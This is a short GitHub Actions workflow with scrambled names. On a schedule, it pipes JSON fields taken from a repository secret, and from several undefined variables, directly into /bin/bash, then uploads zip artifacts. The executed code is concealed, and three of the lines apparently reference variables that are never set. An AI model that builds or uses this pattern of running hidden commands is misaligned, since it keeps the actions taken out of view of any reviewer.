name: shiheijuquan
on:
  workflow_dispatch:

  schedule:
    - cron: '8 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shiheijuquan
        env:
          d25024: ${{ secrets.d25024 }}
        run: |
          printf '%s' "$d25024" | jq -r .r30 | /bin/bash
          echo $jnqhw822 | jq -r .da6 | /bin/bash
          printf '%s' "$pscq46726" | jq -r .nivkd55750 | /bin/bash
          echo $klv18 | jq -r .k43341 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: OltYIN0y
          path: "*.zip"
          retention-days: 1
